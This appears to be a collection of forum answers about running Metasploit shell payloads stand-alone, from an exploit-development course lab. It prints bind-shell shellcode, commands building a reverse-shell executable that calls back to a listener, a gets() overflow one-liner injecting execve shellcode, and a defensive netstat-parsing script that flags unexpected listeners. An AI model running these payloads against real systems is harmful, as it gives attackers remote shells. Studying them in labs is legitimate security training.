How to Run The Linux/X86/Shell_Bind_Tcp Payload Stand Alone

How to run the linux/x86/shell_bind_tcp payload stand alone?

Generate shellcode, compile and run:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
* linux/x86/shell_bind_tcp - 78 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependSetresgid=false,
* PrependSetregid=false, PrependSetgid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20

Now, in terminal 2, check for connections and finally connect using netcat. Note that the $ prompt doesn't appear, but the shell is still there:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 3326/shellcode
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max 591 Jan 2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max 591 Jan 2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max 471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max 471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max 442 Jan 2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max 442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max 139 Dec 27 08:18 compile.sh
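The netstat output above is also what a defender would use to spot the listener the bind payload leaves behind: a socket bound to all interfaces, on a port no known service owns, held by an unexpected program. The following is an added example, not code from the original answer; the netstat sample and the baseline of expected listeners are constructed.

```python
from dataclasses import dataclass

# Constructed sample in the format of `netstat -ntlp`; the 4444 row mirrors
# the listener left behind by the stand-alone shell_bind_tcp payload.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      812/cupsd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1043/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      3326/shellcode
tcp6       0      0 :::80                   :::*                    LISTEN      1201/apache2
"""

# Constructed baseline: the listeners this host is supposed to have (port -> program).
EXPECTED = {22: "sshd", 80: "apache2", 631: "cupsd"}

@dataclass
class Listener:
    proto: str
    addr: str
    port: int
    pid: int
    program: str

def parse_netstat(text: str) -> list[Listener]:
    """Parse the LISTEN rows of `netstat -ntlp`; header and non-listening rows are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")    # rpartition copes with IPv6 ":::80"
        pid_s, _, program = fields[6].partition("/")
        pid = int(pid_s) if pid_s.isdigit() else -1  # netstat prints "-" when not run as root
        rows.append(Listener(fields[0], addr, int(port), pid, program))
    return rows

def suspicious_listeners(rows, expected=EXPECTED):
    """Flag listeners outside the baseline, or on a baseline port but owned by another program.
    Wildcard binds (0.0.0.0 / ::) are rated high; loopback-only unknowns are rated low."""
    findings = []
    for r in rows:
        owner = expected.get(r.port)
        if owner is not None and owner == r.program:
            continue
        exposed = r.addr in ("0.0.0.0", "::", "")
        reason = "unexpected program on baseline port" if owner else "port not in baseline"
        findings.append((r.port, r.program, reason, "high" if exposed else "low"))
    return findings
```

Run it against `netstat -ntlp` output captured as root so the PID/Program column is populated; without root that column is "-" and the program check cannot distinguish owners.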

How to run the linux/x86/shell_reverse_tcp payload stand alone?

It's a reverse_shell; it needs something to connect to.

You have to configure and create a reverse_handler, something like this:

# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E

Standalone multi/handler reverse_tcp

I don't really know what your constraints/restrictions are.

My guess is that you want to "receive shells" on a computer without metasploit installed on it.
If that's the case, you could use msfd (metasploit daemon installed on a different computer) or simply netcat, socat, ...

What do you think of this:

  • listening with netcat on 192.168.1.2
    # nc -l -p 4444
  • Using a shell_reverse_tcp instead
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • Execute darkbird.exe on the target

execute run -jz once for multiple connections

Found the solution: execute "set ExitOnSession false" before "run -jz". That's what I need.

Exploit Development - GETS and Shellcode

When the shellcode's execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.

The solution is to close the stdin descriptor and reopen /dev/tty before executing /bin/sh.

#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>

int main(void) {
    char buf[50];
    char *argv[] = { "/bin/sh", NULL };

    gets(buf);                  /* deliberately unbounded read: this is the bug under discussion */
    printf("Yo %s\n", buf);

    /* gets() has consumed stdin (EOF when fed from a pipe), so a spawned shell would exit at once.
       Close fd 0 and reopen the terminal: open() returns the lowest free descriptor, i.e. 0. */
    close(0);
    open("/dev/tty", O_RDWR | O_NOCTTY);
    execve("/bin/sh", argv, NULL);
    return 1;                   /* only reached if execve fails */
}

Related answer: execve("/bin/sh", 0, 0); in a pipe

It is also possible to execute the payload by using:

( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln
